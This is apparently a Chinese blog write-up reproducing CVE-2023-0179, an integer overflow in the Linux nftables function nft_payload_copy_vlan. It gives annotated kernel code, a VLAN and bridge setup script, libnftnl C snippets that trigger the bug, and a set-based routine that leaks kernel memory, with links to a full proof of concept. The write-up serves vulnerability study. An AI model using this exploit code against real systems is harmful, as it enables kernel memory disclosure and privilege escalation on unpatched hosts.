CVE-2023-0179-Nftables整型溢出

前言

Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(Network Address Translation,NAT)、数据包过滤等功能。

漏洞成因

漏洞发生在nft_payload_copy_vlan函数内部,由于计算拷贝的VLAN帧的头部的长度时存在整型溢出,导致了拷贝超出头部长度的数据。

代码细节如下:

nft_payload_copy_vlan

#define VLAN_HLEN 4  /* The additional bytes required by VLAN
                     * (in addition to the Ethernet header)
                     */
#define VLAN_ETH_HLEN 18  /* Total octets in header.  */


/*
* d表示目的寄存器
* skb通常是网络协议栈的缓存区
* offset为数据包的偏移量
* len为拷贝的长度
*/
static bool
nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
{
    int mac_off = skb_mac_header(skb) - skb->data; //获取以太网帧头部偏移
    u8 *vlanh, *dst_u8 = (u8 *) d; 
    struct vlan_ethhdr veth;
    u8 vlan_hlen = 0;
    
    /*
        IEEE 8021Q协议是对标准的以太网帧进行修改,加入了VLAN tag
        IEEE 8021AD协议则是加入双重VLAN tag,一个用于内网,一个用于外网
    */
    if ((skb->protocol == htons(ETH_P_8021AD) ||
         skb->protocol == htons(ETH_P_8021Q)) &&
        offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)
        vlan_hlen += VLAN_HLEN;

    vlanh = (u8 *) &veth;
    if (offset < VLAN_ETH_HLEN + vlan_hlen) { //offset < 18 + 4
        u8 ethlen = len; //拷贝的长度

        if (vlan_hlen &&
            skb_copy_bits(skb, mac_off, &veth, VLAN_ETH_HLEN) < 0)
            return false;
        else if (!nft_payload_rebuild_vlan_hdr(skb, mac_off, &veth))
            return false;

        if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
            ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
            //ethlen = ethlen - (offet + len - VLAN_ETH_HLEN + vlan_hlen);
            //ethlen = ethlen - offset - len + VLAN_ETH_HELN - vlan_hlen;
            //ethlen = VLAN_ETH_HELN - vlan_hlen - offset
            //ethlen = 14 - offset
            //如果offset > 14 则会造成 ethlen溢出
            

        memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen); //这里实际上是拷贝vlan帧的头部,但是如果ethlen发生了溢出则会拷贝多余的字节

        len -= ethlen;
        if (len == 0)
            return true;

        dst_u8 += ethlen;
        offset = ETH_HLEN + vlan_hlen;
    } else {
        offset -= VLAN_HLEN + vlan_hlen;
    }

    return skb_copy_bits(skb, offset + mac_off, dst_u8, len) == 0;
}

该函数实际的作用就是从数据包中将VLAN头拷贝到指定的寄存器中进行存储,函数开始会对数据包的协议进行校验,若是为IEEE 8021QIEEE 8021AD协议则说明以太网帧中增加了VLAN TAG,那么再拷贝VLAN头时需要将TAG也计算在内。在拷贝之前需要先计算待拷贝的长度,因此会进行一个长度的校验,若偏移加长度超过了VLAN帧的头部长度时,就需要对拷贝长度进行一个校准,防止拷贝过多的数据,但是这个校验有问题,通过上述推导的公式可以发现,当offset大于14且小于22并且offset+len的值大于22时,ethlen就会发生溢出,这是因为ethlen本身为无符号整型,当得到结果为负数时,会导致ethlen变成非常大。

这里有一个需要注意的点,在计算时ethlen时会加上vlan_hlen而不是减掉是因为在拷贝的时候会默认先减去vlan_hlen

那么当offset = 19len = 4时,则offset + len = 23 > 22,因此会进入if语句内部,接着ethlen = 14 - 19 = -5(发生溢出)

环境搭建

这里采用的是qemu + linux6.16内核进行环境的搭建。作者创建虚拟网络设备的脚本如下

https://github.com/TurtleARM/CVE-2023-0179-PoC/blob/master/setup.sh

#!/bin/sh

# create the peer virtual device
ip link add eth0 type veth peer name host-enp3s0
ip link set host-enp3s0 up
ip link set eth0 up
ip addr add 192.168.137.137/24 dev host-enp3s0
# add two vlans on top of it
ip link add link host-enp3s0 name vlan.5 type vlan id 5
ip link add link vlan.5 name vlan.10 type vlan id 10
ip addr add 192.168.147.137/24 dev vlan.10
ip link set vlan.5 up
ip link set vlan.10 up
ip link set lo up
# create a bridge to enable hooks
ip link add name br0 type bridge
ip link set dev br0 up
ip link set eth0 master br0
ip addr add 192.168.157.137/24 dev br0

可以看到作者在漏洞利用之前需要创建一些虚拟的网络设备,例如虚拟设备对,vlan接口以及网桥。这是因为想要进入nft_payload_copy_vlan函数的执行流程,需要数据包在vlan上进行传输才可以。代码如下所示:

void nft_payload_eval(const struct nft_expr *expr,
              struct nft_regs *regs,
              const struct nft_pktinfo *pkt)
{
    const struct nft_payload *priv = nft_expr_priv(expr);
    const struct sk_buff *skb = pkt->skb;
    u32 *dest = &regs->data[priv->dreg];
    int offset;

    if (priv->len % NFT_REG32_SIZE)
        dest[priv->len / NFT_REG32_SIZE] = 0;

    switch (priv->base) {
    case NFT_PAYLOAD_LL_HEADER: //数据链路层
        if (!skb_mac_header_was_set(skb)) //判断数据包是否为mac头
            goto err;

        if (skb_vlan_tag_present(skb)) { //判断数据包是否有vlan标志
            if (!nft_payload_copy_vlan(dest, skb,
                           priv->offset, priv->len))
                goto err;
            return;
        }
        offset = skb_mac_header(skb) - skb->data;
        break;
...

因此为了使得程序进入漏洞函数,需要建设特定的网络环境。而该网络拓扑与Docker的很像,具体内容可以参考https://cloud.tencent.com/developer/article/1835299。网络拓扑大致如下,使用虚拟设备对的作用时,一端接口作为数据的输入而另一端接口作为数据的流出,那么后续进行`hook`的时候只需要`hook`一个点就行,设置`vlan`接口是因为只有`vlan`的数据包才能够进入`nft_payload_copy_vlan`函数的流程内,而在`vlan.5`上再次创建一个`vlan`接口是因为使得数据包能够加入双层`vlan tag,这样可以通过IEEE 8021AD`协议传输。

图片

但是我在qemu的环境调试时数据包的协议都不是IEEE 8021AD而是IEEE 8021Q,在查询资料https://blog.csdn.net/m0_45406092/article/details/118497597发现,可以指定`vlan`的类型为`IEEE 8021AD`,因此修改了一下脚本。

#!/bin/sh

# create the peer virtual device
ip link add eth32 type veth peer name host-enp3s0
ip link set host-enp3s0 up
ip link set eth32 up
#ip addr add 192.168.137.137/24 dev host-enp3s0
# add two vlans on top of it
ip link add link host-enp3s0 name vlan.5 type vlan id 5
ip link add link vlan.5 name vlan.10 type vlan  protocol  802.1ad  id 10 
#ip addr add 192.168.147.137/24 dev vlan.5
ip link set vlan.5 up
ip link set lo up
ip link set vlan.10 up

指定协议之后,数据包的协议也被为IEEE 8021AD

图片

图片

至此环境就搭建完毕了。这里需要注意的是在编译内核的时候由于需要用到vlanbridge以及IEEE 8021Q,因此需要开启这些模块,否则在创建设备时会出现unknow的错误。

漏洞验证

可以使用libnftnl库进行nftableshttps://github.com/tklauser/libnftnl/tree/master进行规则的设置

nftables需要设置table -> chain -> rule -> expr,由于我们需要捕获在虚拟设备对上的数据包,因此可以设置协议类型为NFPROTO_NETDEV,该协议类型是处理来自入口的数据包并且配合ingressHOOK点以及chain可以指定HOOK点在具体的设备上,那么配合我们搭建的网络设备环境,可以指定HOOK点为以太网口(eth32)

...
    if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL))
    {
        perror("[-] create table");
        exit(-1);
    }
    
    /* 2. create chain */
    printf("[2] create chain\n");
    struct unft_base_chain_param up;
    up.hook_num = NF_NETDEV_INGRESS;
    up.prio = INT_MIN;
    if (create_chain(nl, table_name, chain_name,  NFPROTO_NETDEV, &up, &seq, NULL, dev_name))
    {
        perror("[-] create chain");
        exit(-1);
    }
...

然后再设置payload的表达式触发漏洞,我们将offset设置为19,len设置为5

rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, 19, 4, NFT_REG32_00);

可以看到我们成功将ethlen的值设置为了251的值,该值是远远超出了以太网帧头部的长度了。

图片

 

可以看到寄存器中的值中除了以太网帧头部的数据,还有一些额外的数据了。

图片

 

为了将这些数据打印出来,则需要利用nftables中自带的set(集合),集合实际是一组数据,例如我们需要过滤几个ip地址,就能将这些ip地址作为一个集合作为过滤的名单,而集合中有一种属性是map即以键值对的形式存储值,而这些值实际是可以通过寄存器进行添加的,那么我们就将上述寄存器的值添加到集合中使用nft list ruleset的命令就可以再屏幕中获取内核的信息了。创建集合的代码如下:

//创建集合
struct nftnl_set* build_set(char* table_name, char* set_name, uint16_t family)
{
    struct nftnl_set *s = NULL;
    
    s = nftnl_set_alloc();
    
    if (s == NULL) {
        perror("OOM");
        exit(EXIT_FAILURE);
    }
    
    nftnl_set_set_str(s, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(s, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(s, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, 4);
    /* See nftables/include/datatype.h, where TYPE_INET_SERVICE is 13. We
     * should place these datatypes in a public header so third party
     * applications still work with nftables.
     */
    nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, NFT_DATA_VALUE); //以16进制的形式存储数据
    nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, 4);
    nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE);//以16进制的形式存储数据
    nftnl_set_set_u32(s, NFTNL_SET_ID, 1);
    nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP);  //以map存储数据

    return s;
}

在创建完集合后,往集合里面添加数据是通过表达式完成的,而动态的添加以及删除集合中的元素则是通过dynset表达式进行处理,添加表达式代码如下:

void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data)
{
    struct nftnl_expr *expr = nftnl_expr_alloc("dynset");
    nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); //需要指定添加元素的集合名称
    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); //指定操作为添加操作
    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1);
    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); //键
    nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data);//值
    nftnl_rule_add_expr(r, expr);
}

这里需要注意的是,我们指定了捕获数据包的网口,因此数据包需要途径该网口才能够捕获数据包,下面是作者使用的数据包发送的代码,首先是绑定发送数据包的端口为vlan.10,由于vlan.10是在vlan.5上创建的,因此从vlan.10出去的数据包会被打上双层vlan tag,并且vlan.5是在host-enps32上创建的,而host-enps32又是与eth32构成虚拟设备对,因此数据包最终会从eth32发出并且携带双重的vlan tag从而进入nft_payload_copy_vlan的函数内部,触发漏洞。

int send_packet() 
{
    int sockfd;
    struct sockaddr_in addr;
    char buffer[] = "This is a test message";
    char *interface_name = "vlan.10";  // double-tagged packet
    int interface_index;
    struct ifreq ifr;
    memset(&ifr, 0, sizeof(ifr));
    memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name)));

    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sockfd < 0) {
        perror("[-] Error creating socket");
        return 1;
    }
 
    // Set the SO_BINDTODEVICE socket option
    if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) {
        perror("[-] Error setting SO_BINDTODEVICE socket option");
        return 1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr("192.168.123.123");  // random destination
    addr.sin_port = htons(1337); 
    
    // Send the UDP packet
    if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
        perror("[-] Error sending UDP packet");
        return 1;
    }

    close(sockfd);
    return 0;
}

可以看到最终完成了内核信息的泄露。

图片

 

完整poc:https://github.com/h0pe-ay/Vulnerability-Reproduction/blob/master/CVE-2023-0179/poc.c

漏洞利用

  • • 利用JUMP调整stacksize

  • • 设置寄存器的值

  • • 利用nft_payload_copy_vlan触发漏洞拷贝payload

参考链接

https://github.com/TurtleARM/CVE-2023-0179-PoC

https://github.com/pqlx/CVE-2022-1015

https://www.ctfiot.com/100156.html

https://www.cnblogs.com/mutudou/p/14244640.html

https://zhuanlan.zhihu.com/p/554612685

https://cloud.tencent.com/developer/article/1835299

https://github.com/tklauser/libnftnl/tree/master

https://blog.csdn.net/qq_33997198/article/details/118370071

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/123410.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

19、Flink 的Table API 和 SQL 中的自定义函数及示例(3)

Flink 系列文章 1、Flink 部署、概念介绍、source、transformation、sink使用示例、四大基石介绍和示例等系列综合文章链接 13、Flink 的table api与sql的基本概念、通用api介绍及入门示例 14、Flink 的table api与sql之数据类型: 内置数据类型以及它们的属性 15、Flink 的ta…

2023年破圈:盘点11个新零售商业模式,永远不再打商业价格战

2023年破圈&#xff1a;盘点11个新零售商业模式&#xff0c;永远不再打商业价格战 前沿&#xff1a;纵观今年互联网各种类型项目&#xff0c;基本都是又短又快&#xff0c;但依然也有风靡的短跑冠军&#xff0c;那么互联网的项目能否跑的长久&#xff0c;是否是商业模式的原因&…

C++ —— map 和 multimap

一、map 1.介绍 1. map是关联容器&#xff0c;它按照特定的次序(按照key来比较)存储由键值key和值value组合而成的元 素。 2. 在map中&#xff0c;键值key通常用于排序和惟一地标识元素&#xff0c;而值value中存储与此键值key关联的内容。键值key和值value的类型可能不同&am…

NAT协议

目录 NAT 前言 NAT地址转换表 NAT分类 前言 静态NAT 192.168.1.2访问200.1.1.2执行过程 动态NAT 192.168.1.2访问200.1.1.2执行过程 NAPT 192.168.1.2的5000端口访问200.1.1.2的80端口执行过程 基本命令 配置动态NAPT转换 定义内外网接口 配置NAPT 静态NAPT配置…

Linux基础【Linux知识贩卖机】

偶尔的停顿和修整&#xff0c;对于人生是非常必要的。 --随记 文章目录 Linux目录目录结构磁盘分区相关命令 相对路径和绝对路径 文件权限用户分类umask创建文件权限计算方法粘滞位 总结 Linux目录 目录结构 Linux 操作系统采用了一种层次化的目录结构&#xff0c;常被称为标…

使命担当 守护安全 | 中睿天下获全国海关信息中心感谢信

近日&#xff0c;全国海关信息中心向中睿天下发来感谢信&#xff0c;对中睿天下在2023年网络攻防演练专项活动中的大力支持和优异表现给予了高度赞扬。 中睿天下对此次任务高度重视&#xff0c;紧密围绕全国海关信息中心的行动要求&#xff0c;发挥自身优势有效整合资源&#x…

vivado时序分析-2时序分析关键概念

时序分析关键概念 1、最大和最小延迟分析 时序分析属静态验证 &#xff0c; 旨在验证在硬件上加载并运行设计后 &#xff0c; 其时序行为的可预测性。它会将各种制造和环境变化因素组合到延迟模型中并按时序角及其变化量加以分组&#xff0c; 将所有这些要素一并纳入考量范围。…

[动态规划] (十三) 简单多状态 LeetCode 740.删除并获得点数

[动态规划] (十三) 简单多状态: LeetCode 740.删除并获得点数 文章目录 [动态规划] (十三) 简单多状态: LeetCode 740.删除并获得点数题目解析解题思路状态表示状态转移方程初始化和填表顺序返回值 代码实现总结 740. 删除并获得点数 题目解析 (1) 给定一个整数数组。 (2) 选…

lvgl 转换和使用新字体

一、背景 如果lvgl 提供的默认字体不符合我们的显示要求&#xff0c;我们可以在网上下载开源字体&#xff0c;或者利用系统自带&#xff08;注意版权问题&#xff09;的字体文件转换lvgl 能识别和调用的字体。 或者为了压缩存储空间&#xff0c;某些字体我们只需要个别字符&…

【数据结构】堆排序和top-K问题

堆的实现源码 #define _CRT_SECURE_NO_WARNINGS#include <stdio.h> #include <stdlib.h> #include <time.h> #include <stdbool.h> #include <assert.h> typedef struct Heap {int* a;int size;int capacity; }Heap; void HeapInit(Heap* st) {…

nacos做服务配置和服务器发现

一、创建项目 1、创建一个spring-boot的项目 2、创建三个模块file、system、gateway模块 3、file和system分别配置启动信息,并且创建一个简单的控制器 server.port9000 spring.application.namefile server.servlet.context-path/file4、在根目录下引入依赖 <properties&g…

《UML和模式应用(原书第3版)》2024新修订译本部分截图

DDD领域驱动设计批评文集 做强化自测题获得“软件方法建模师”称号 《软件方法》各章合集 机械工业出版社即将在2024春节前后推出《UML和模式应用&#xff08;原书第3版&#xff09;》的典藏版。 受出版社委托&#xff0c;UMLChina审校了原中译本并做了一些修订。同比来说&a…

工业镜头接口类型

现有产品主要有以下接口 1、C:最常见的工业相机接口&#xff0c;受限于接口物理尺寸大小&#xff0c;最大靶面目前是4/3” 2、M42:M421.0,2k和4k线阵相机使用 3、M58S:M580.75,大靶面相机使用&#xff0c;可以转C(限于CH080相机&#xff0c;靶面4/3”)&#xff0c;可以转F,可以…

数据分析实战 | 多元回归——广告收入数据分析

目录 一、数据及分析对象 二、目的及分析任务 三、方法及工具 四、数据读入 五、数据理解 六、数据准备 七、模型构建 八、模型预测 九、模型评价 一、数据及分析对象 CSV格式的数据文件——“Advertising.csv” 数据集链接&#xff1a;https://download.csdn.net/d…

数据结构-双向链表

目录 1.带头双向循环链表&#xff1a; 2. 带头双向循环链表的实现&#xff1a; 双向链表初始化&#xff1a; 双向链表打印&#xff1a; 开辟节点函数&#xff1a; 双向链表头插&#xff1a; 双向链表尾插&#xff1a; 双向链表头删&#xff1a; 双向链表尾删&#xff…

C语言学习笔记之结构篇

C语言是一门结构化程序设计语言。在C语言看来&#xff0c;现实生活中的任何事情都可看作是三大结构或者三大结构的组合的抽象&#xff0c;即顺序&#xff0c;分支&#xff08;选择&#xff09;&#xff0c;循环。 所谓顺序就是一条路走到黑&#xff1b;生活中在很多事情上我们都…

景联文科技提供高质量人像采集服务,助力3D虚拟人提升逼真度

人像采集是一种通过特定设备或技术&#xff0c;对人的相貌、身材等特征信息进行收集和处理的过程&#xff0c;可应用于3D虚拟人领域。通过采集大量的人像数据&#xff0c;可以训练和优化人像识别算法&#xff0c;提高其准确性。 人像采集对于提高3D虚拟人的逼真度、个性化定制以…

【手把手教你】将python程序打包成exe可执行文件

1. 安装环境 pip install pyinstaller6.0.02. 打包文件 pyinstaller -D “要启动的文件名“.py比如我的命令就是&#xff1a;pyinstaller -D eval.py 执行完后&#xff0c;会生两个文件夹dist和bulib两个文件和一个xxx.spec文件 3. 删除生成的文件 删除生成的bulid和dist文…

Java学习 8.Java-递归

一、递归的概念 引例&#xff1a; 一个方法在执行过程中调用自身&#xff0c;就称为递归&#xff08;函数自己调用自己&#xff09; 递归相当于数学的数学归纳法&#xff0c;有一个起始条件&#xff0c;有一个递推公式 递归的必要条件 1.将原问题划分为子问题&#xff0c;…

使用数据分析,识别设备异常

设备健康监测系统在工业领域中扮演着至关重要的角色&#xff0c;它能够帮助企业及时发现设备异常&#xff0c;预防故障&#xff0c;提高设备使用寿命和生产效率。而异常诊断技术则是设备健康监测系统中的核心部分&#xff0c;能够实现对设备异常情况的准确判断。根据设备状态数…